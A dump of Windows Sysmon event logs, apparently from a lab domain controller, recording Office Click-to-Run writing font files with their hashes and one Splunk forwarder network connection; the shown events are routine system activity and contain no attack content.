Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ERASMD.TTFMD5=00C37A78F957AB5B14C2C7AABDDACE19,SHA256=856137000A507908E4C289410917DB83D19DA88F6050AF71675211BA68E9E0B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ERASLGHT.TTFMD5=47620DE5B73D9318A0542DD364FFB8FC,SHA256=D432C14B62C70F4777F9DB5901063B76D8DB88B27ACA46A5FB5B4A4C552C5C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ERASDEMI.TTFMD5=9F7891F4F192F1E8360990FADCCCCAFB,SHA256=9633185651DBEC620C26F03E96E8D604A743C93D85E2B51E2F57C795A86CD642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ERASBD.TTFMD5=D5213044CFAD1E4F4B5D1F3138752A80,SHA256=88D1A747CEC854B6EFD25A2721F250C5623F61A818A6EA5E219408485FC9A3BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ENGR.TTFMD5=F3D98212A5FD124474AE99EA8EAEDF54,SHA256=944DD47CC65586F54D83ED55D654C82B179111B2651E6E1D575C2F4BDA55085C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ELEPHNTI.TTFMD5=6181D6A8937454D333ECFBAF1F8DA63E,SHA256=F9FF23ECB4DD03C511E5462D0B3563B733D4A924579D41C1DF8FCB68D647D2D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ELEPHNT.TTFMD5=FC2CDC9B17DF077275E69B3103F6A30E,SHA256=327EE1DA1A144B1BD7970A8715DAF00159EE1D0A9A81AEB33DCBF02631ED56E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\DUBAI-REGULAR.TTFMD5=721B44EBFB0C75F8F78E5DC6FDC48DAF,SHA256=7A0BE62452C4A73B8F86F3B6C1B0915074C47FA40BB658255B3D0B1CDF6D2F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\DUBAI-MEDIUM.TTFMD5=89656B3F0A9CB59E470F47C9B68D3660,SHA256=D460CC9F99A343531A93AE4D6DCAC016DD3BEFE64EAEF54FA9B7C4980DA951BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\DUBAI-LIGHT.TTFMD5=68C64C93560227615BB141B4402F39A4,SHA256=BD55D928275881A6ED2576C6B031D161C52F7E6F07EC396A75F00A00E6F6B51B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\DUBAI-BOLD.TTFMD5=889EEB6E8A80597B9A85D9667EC2D63B,SHA256=B4CE691C229DD0AD05D945354DEE37EC2F75E031A0C7ADA786BAEC55B88AE230,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CURLZ___.TTFMD5=D2215729B1C20B9DC5E6230EB6497E6F,SHA256=CAF7D153D2860F395F846DB58032173C3F76B57F9368EC08382F728742CF5A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\COPRGTL.TTFMD5=4E9A36A2C68BCFBE6EE3FFEE2EF8027E,SHA256=607520E814EBD77845CFB7824D0AFD47FFFF9EA4F335C8F2DB356D3C6396A99D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\COPRGTB.TTFMD5=C277B2C27239A1C8DE888444341D1C62,SHA256=F354B9E48583DD9CB2A60DCD79EAA787722396D768AAC0608D2AC0751D35BC3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\COOPBL.TTFMD5=8EB03871E6046162EFCE5F2CDF5FA849,SHA256=0518E37FD63C8B97D63A6CE678EACA254F0677AB94D420E99860772ECF348636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\COLONNA.TTFMD5=470007A3390867B2B06B3E4883BC7230,SHA256=7DA22B3012C6071B7756F6D077ADA0CBEF49D66DCCB7667AB74C97B3748675D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CHILLER.TTFMD5=B1B2E2DB2EEF02D230247A474D1D66A6,SHA256=64327EA7BCCC5583396D6796CBC535D27C0389906A36312E5811D9EC535C6A03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CENTURY.TTFMD5=28806FBBD48444F22EDEE13BDDEEF650,SHA256=21BE61FF5289C2125DBB48E2A739FD4DD98C3E58B37ABFC22CC0412DD8376D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CENTAUR.TTFMD5=C73219B4E3994DD86E88720CBA0916FF,SHA256=1D9FEC6F9B2B72203EA56A4C7E3B40499984829FF99AE8AE53340FD8D5F07FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CENSCBK.TTFMD5=47DA73E52C097234E8CC607631DDC910,SHA256=8209F9295B20A9C3D0F7E5163D7EF9946353E653C40F25E7EF9F905856EC246A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.243{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57505-false10.0.1.12-8000- 23542300x800000000000000070609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CASTELAR.TTFMD5=0407ED4AEF00D4DB57F6001E710E0A85,SHA256=5D5DB8AE79E77ADCA68E52454088F3A456F363ACC9F577CC6DD08B18FA996BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALISTI.TTFMD5=C63563FB94142E1D20DB1C00A8964EFD,SHA256=C7F699A3F94E57187ED36F1ACEBFE3E0460615BA368D14ED0AAB45272844C1D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALISTBI.TTFMD5=B8178488B4DECB255BD3094B320600AC,SHA256=9B9E45F016B013D92C3CAF1985DB22F85E39C8B1F208636F9AC21F9C135239CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALISTB.TTFMD5=D267423924483DDC3DBB9E4E94199D59,SHA256=1B3949401E310A5967A4C108BB9BE49E28E69F73095AD088F783035E8F22D28F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALIST.TTFMD5=58862B5F5172C3609C9B0CED6DA89B12,SHA256=F976B470E19FDE1971824107182927472CF67A08ACC42F8E2F23951312863A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALIFR.TTFMD5=12C13307742D4E286B692CCE7EC65307,SHA256=A779C135081030298594EA50FCDF59BCF5CD341008137931E2FD0E68D4CA65D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALIFI.TTFMD5=4963FCD0C4739DD18AD5D5A9F39201B3,SHA256=56B5168F5B847CE0F3280076D6C0ED026681CE3C5141629F5D8EBA92DD1FCCCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CALIFB.TTFMD5=49500622E8D94B07ADDA1289DFE8D5BC,SHA256=9E23CBA751CDD44DD7466E019B38D29360CEE1ACA62BD4B75DFC5CCA93EA4B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CalibriLI.ttfMD5=3567D339A4859211316D2894F44EE97E,SHA256=93798D1047507741959132E544BFC4A071EF060A59B71C76C1A7B684944ACDAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\CalibriL.ttfMD5=8FF6C498C08FFB65CA6B586C0E5DBE7F,SHA256=853709C6521F9B211343A3E2B92C62A4A01074DED478B67FB88AD9D27C9F3E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BSSYM7.TTFMD5=549DDDCECFD3E61F35F4FDE66019618F,SHA256=3BD67D5982D259580A6D032F375C3B80E58C4496FFD8858B377DD69123809819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRUSHSCI.TTFMD5=240A8744EDC221DFD7467D2D17105FA0,SHA256=B77D119749B51C7AE5242DD093360D5B1C94117469E578CFDD2DE03FDC55EDA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BROADW.TTFMD5=1061E922AC6D0F148514C785C4E46721,SHA256=A252B1E5D460F1E0E4781146186393E5B217AB379DB237C7BCB8D7C353943EDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRLNSR.TTFMD5=FE2027C27B6A24505F548C6FD2E1076D,SHA256=0B6044C72E67AAAE9C2AE3C8B4BB06D066FDBC02779C68E3883984ACBBE24CB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRLNSDB.TTFMD5=B6539B6D3432C623D8D4F9CC2A29589E,SHA256=4C50D832F4E1401E226566159735DAE932DD224D795AC57772061096117E4147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRLNSB.TTFMD5=D725100FC87C3EE6F87BF66BA47E9432,SHA256=AD7D00C413FE11EC423FF5E2B63DA7D403049AB3BABF13D0B2AB34A43F4D4A55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRITANIC.TTFMD5=E22ABE6DE548655066DF3522DA0FE4B3,SHA256=1AA27A3E349A8C8DAF466E0F89E94B0DC5B9CBE82E0D7A77E04D3DD6E1588E3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BRADHITC.TTFMD5=0252223E8C36008B595F5E379AD5E524,SHA256=1F7AD9E753A88DA096121BD831A7DF72868AC48B8EDEFC8C96C7A73303F1575D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOOKOSI.TTFMD5=5D3E5403FE85DC7C6920A779D14E0C8A,SHA256=EC990C65DF2BA6EAD654BCB69F7F88BB76910B029F2EDF663710CAE3FDE5F7DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOOKOSBI.TTFMD5=E7542F998594B425B8728191C4D11D96,SHA256=2DE5E34DAF966BE8E165BD5604AC0714A7946EA2A0A08F86FF04E687ED54D8D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOOKOSB.TTFMD5=E6AD3E9485E85796A3EBB481164ABEE7,SHA256=EC95C7380AB7F92EBC75BBA6C56A80646FCB450EF6CCCC631852A8B97BE75C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOOKOS.TTFMD5=4267D8AA8711BB8C72CBEFB26066C9E0,SHA256=8F2DF7DBC1F2B790F6E6FDD24DBB6C2A96B6E554BA2031C3AB0FE34D322A1B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_R.TTFMD5=6DAB0445C8D34FB318948E3CB7362D19,SHA256=17B06990413AB318B9E9F2C05D3816059F56D7A678F4712849A3318A9E5E7C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_PSTC.TTFMD5=7699FAEBC41A8265A4EF97B92548839F,SHA256=D0EFCBB58042808781F33898DC0FBE5342DA22D813415A4DCB394872B1D19AFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 